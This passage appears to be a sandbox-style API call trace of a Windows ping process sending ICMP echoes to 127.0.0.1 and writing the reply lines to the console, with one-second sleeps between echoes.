0x4ec3b8 [0114.990] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x4f5270 [0114.990] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x2bf5a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0114.991] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="竈O﹨+┗\x94䰨盪❋") returned 0x14 [0114.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.992] _fileno (_File=0x76ea4c28) returned 1 [0114.992] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.992] GetFileType (hFile=0x28) returned 0x2 [0114.992] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0114.992] GetLastError () returned 0x6 [0114.992] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+❋") returned 0x0 [0114.992] _fileno (_File=0x76ea4c28) returned 1 [0114.992] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.992] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4f7b00 [0114.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x4f7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0114.992] _fileno (_File=0x76ea4c28) returned 1 [0114.992] _write (in: _FileHandle=1, _Buf=0x4f7b00*, _MaxCharCount=0x14 | out: _Buf=0x4f7b00*) returned 20 [0114.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.992] _fileno (_File=0x76ea4c28) returned 1 [0114.992] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.992] LocalFree (hMem=0x4f7b00) returned 0x0 [0114.992] LocalFree (hMem=0x4f7ac8) returned 0x0 [0114.992] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="竈O﹨+▪\x94䰨盪❚") returned 0x18 [0114.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.992] _fileno (_File=0x76ea4c28) returned 1 [0114.992] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.993] GetFileType (hFile=0x28) returned 0x2 [0114.993] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0114.993] GetLastError () returned 0x6 [0114.993] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+❚") returned 0x0 [0114.993] _fileno (_File=0x76ea4c28) returned 1 [0114.993] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.993] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0114.993] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x4ec1b0 [0114.993] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x4ec1b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0114.993] _fileno (_File=0x76ea4c28) returned 1 [0114.993] _write (in: _FileHandle=1, _Buf=0x4ec1b0*, _MaxCharCount=0x18 | out: _Buf=0x4ec1b0*) returned 24 [0114.993] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.993] _fileno (_File=0x76ea4c28) returned 1 [0114.993] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.993] LocalFree (hMem=0x4ec1b0) returned 0x0 [0114.993] LocalFree (hMem=0x4f7ac8) returned 0x0 [0114.993] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0114.993] IcmpSendEcho2Ex (in: IcmpHandle=0x4e6b10, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x4ec3b8, RequestSize=0x20, RequestOptions=0x2bf514, ReplyBuffer=0x4f5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4f5270) returned 0x1 [0114.994] InetNtopW (in: Family=2, pAddr=0x2bf504, pStringBuf=0x2bf62c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0114.994] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="筐O﹨+⛔\x94䰨盪✣") returned 0x16 [0114.994] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.994] _fileno (_File=0x76ea4c28) returned 1 [0114.994] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.994] GetFileType (hFile=0x28) returned 0x2 [0114.994] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0114.994] GetLastError () returned 0x6 [0114.994] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✣") returned 0x0 [0114.994] _fileno (_File=0x76ea4c28) returned 1 [0114.994] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.994] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0114.994] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4f7fd8 [0114.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x4f7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _write (in: _FileHandle=1, _Buf=0x4f7fd8*, _MaxCharCount=0x16 | out: _Buf=0x4f7fd8*) returned 22 [0114.995] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.995] LocalFree (hMem=0x4f7fd8) returned 0x0 [0114.995] LocalFree (hMem=0x4f7b50) returned 0x0 [0114.995] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⛿\x94䰨盪✼") returned 0x9 [0114.995] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.995] GetFileType (hFile=0x28) returned 0x2 [0114.995] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0114.995] GetLastError () returned 0x6 [0114.995] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✼") returned 0x0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.995] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e89e8 [0114.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x4e89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _write (in: _FileHandle=1, _Buf=0x4e89e8*, _MaxCharCount=0x9 | out: _Buf=0x4e89e8*) returned 9 [0114.995] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.995] LocalFree (hMem=0x4e89e8) returned 0x0 [0114.995] LocalFree (hMem=0x4f7fd8) returned 0x0 [0114.995] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x2bf49c, nSize=0x0, Arguments=0x2bf498 | out: lpBuffer="翘O﹨+➷\x94䰨盪✧") returned 0x9 [0114.995] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.995] GetFileType (hFile=0x28) returned 0x2 [0114.995] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf460 | out: lpMode=0x2bf460) returned 0 [0114.995] GetLastError () returned 0x6 [0114.995] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.995] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8910 [0114.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x4e8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _write (in: _FileHandle=1, _Buf=0x4e8910*, _MaxCharCount=0x9 | out: _Buf=0x4e8910*) returned 9 [0114.995] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.995] _fileno (_File=0x76ea4c28) returned 1 [0114.995] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.995] LocalFree (hMem=0x4e8910) returned 0x0 [0114.996] LocalFree (hMem=0x4f7fd8) returned 0x0 [0114.996] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⟘\x94䰨盪✨") returned 0x9 [0114.996] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.996] _fileno (_File=0x76ea4c28) returned 1 [0114.996] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.996] GetFileType (hFile=0x28) returned 0x2 [0114.996] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0114.996] GetLastError () returned 0x6 [0114.996] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✨") returned 0x0 [0114.996] _fileno (_File=0x76ea4c28) returned 1 [0114.996] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.996] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.996] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8a30 [0114.996] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x4e8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0114.996] _fileno (_File=0x76ea4c28) returned 1 [0114.996] _write (in: _FileHandle=1, _Buf=0x4e8a30*, _MaxCharCount=0x9 | out: _Buf=0x4e8a30*) returned 9 [0114.996] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.996] _fileno (_File=0x76ea4c28) returned 1 [0114.996] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.996] LocalFree (hMem=0x4e8a30) returned 0x0 [0114.996] LocalFree (hMem=0x4f7fd8) returned 0x0 [0114.996] Sleep (dwMilliseconds=0x3e8) [0115.999] IcmpSendEcho2Ex (in: IcmpHandle=0x4e6b10, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x4ec3b8, RequestSize=0x20, RequestOptions=0x2bf514, ReplyBuffer=0x4f5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4f5270) returned 0x1 [0116.000] InetNtopW (in: Family=2, pAddr=0x2bf504, pStringBuf=0x2bf62c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0116.000] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="筐O﹨+⛔\x94䰨盪✣") returned 0x16 [0116.000] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _get_osfhandle (_FileHandle=1) returned 0x28 [0116.000] GetFileType (hFile=0x28) returned 0x2 [0116.000] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0116.000] GetLastError () returned 0x6 [0116.000] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✣") returned 0x0 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.000] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4f7fd8 [0116.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x4f7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _write (in: _FileHandle=1, _Buf=0x4f7fd8*, _MaxCharCount=0x16 | out: _Buf=0x4f7fd8*) returned 22 [0116.000] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.000] LocalFree (hMem=0x4f7fd8) returned 0x0 [0116.000] LocalFree (hMem=0x4f7b50) returned 0x0 [0116.000] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⛿\x94䰨盪✼") returned 0x9 [0116.000] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _get_osfhandle (_FileHandle=1) returned 0x28 [0116.000] GetFileType (hFile=0x28) returned 0x2 [0116.000] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0116.000] GetLastError () returned 0x6 [0116.000] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✼") returned 0x0 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.000] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8910 [0116.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x4e8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0116.000] _fileno (_File=0x76ea4c28) returned 1 [0116.000] _write (in: _FileHandle=1, _Buf=0x4e8910*, _MaxCharCount=0x9 | out: _Buf=0x4e8910*) returned 9 [0116.002] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.002] LocalFree (hMem=0x4e8910) returned 0x0 [0116.002] LocalFree (hMem=0x4f7fd8) returned 0x0 [0116.002] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x2bf49c, nSize=0x0, Arguments=0x2bf498 | out: lpBuffer="翘O﹨+➷\x94䰨盪✧") returned 0x9 [0116.002] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _get_osfhandle (_FileHandle=1) returned 0x28 [0116.002] GetFileType (hFile=0x28) returned 0x2 [0116.002] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf460 | out: lpMode=0x2bf460) returned 0 [0116.002] GetLastError () returned 0x6 [0116.002] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.002] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.002] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8a00 [0116.002] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x4e8a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _write (in: _FileHandle=1, _Buf=0x4e8a00*, _MaxCharCount=0x9 | out: _Buf=0x4e8a00*) returned 9 [0116.002] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0116.002] LocalFree (hMem=0x4e8a00) returned 0x0 [0116.002] LocalFree (hMem=0x4f7fd8) returned 0x0 [0116.002] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⟘\x94䰨盪✨") returned 0x9 [0116.002] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.002] _fileno (_File=0x76ea4c28) returned 1 [0116.002] _get_osfhandle (_FileHandle=1) returned 0x28 [0116.002] GetFileType (hFile=0x28) returned 0x2 [0116.002] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0116.002] GetLastError () returned 0x6 [0116.003] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✨") returned 0x0 [0116.003] _fileno (_File=0x76ea4c28) returned 1 [0116.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.003] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.003] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8910 [0116.003] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x4e8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0116.003] _fileno (_File=0x76ea4c28) returned 1 [0116.003] _write (in: _FileHandle=1, _Buf=0x4e8910*, _MaxCharCount=0x9 | out: _Buf=0x4e8910*) returned 9 [0116.003] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0116.003] _fileno (_File=0x76ea4c28) returned 1 [0116.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.003] LocalFree (hMem=0x4e8910) returned 0x0 [0116.003] LocalFree (hMem=0x4f7fd8) returned 0x0 [0116.003] Sleep (dwMilliseconds=0x3e8) [0117.010] IcmpSendEcho2Ex (in: IcmpHandle=0x4e6b10, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x4ec3b8, RequestSize=0x20, RequestOptions=0x2bf514, ReplyBuffer=0x4f5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4f5270) returned 0x1 [0117.011] InetNtopW (in: Family=2, pAddr=0x2bf504, pStringBuf=0x2bf62c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0117.011] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="筐O﹨+⛔\x94䰨盪✣") returned 0x16 [0117.011] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.011] GetFileType (hFile=0x28) returned 0x2 [0117.011] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0117.011] GetLastError () returned 0x6 [0117.011] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✣") returned 0x0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0117.011] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4f7fd8 [0117.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x4f7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _write (in: _FileHandle=1, _Buf=0x4f7fd8*, _MaxCharCount=0x16 | out: _Buf=0x4f7fd8*) returned 22 [0117.011] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.011] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.011] LocalFree (hMem=0x4f7b50) returned 0x0 [0117.011] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⛿\x94䰨盪✼") returned 0x9 [0117.011] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.011] GetFileType (hFile=0x28) returned 0x2 [0117.011] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0117.011] GetLastError () returned 0x6 [0117.011] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✼") returned 0x0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.011] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8910 [0117.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x4e8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _write (in: _FileHandle=1, _Buf=0x4e8910*, _MaxCharCount=0x9 | out: _Buf=0x4e8910*) returned 9 [0117.011] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.011] LocalFree (hMem=0x4e8910) returned 0x0 [0117.011] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.011] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x2bf49c, nSize=0x0, Arguments=0x2bf498 | out: lpBuffer="翘O﹨+➷\x94䰨盪✧") returned 0x9 [0117.011] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.011] _fileno (_File=0x76ea4c28) returned 1 [0117.011] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.011] GetFileType (hFile=0x28) returned 0x2 [0117.012] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf460 | out: lpMode=0x2bf460) returned 0 [0117.012] GetLastError () returned 0x6 [0117.012] GetEnvironmentVariableW (in: 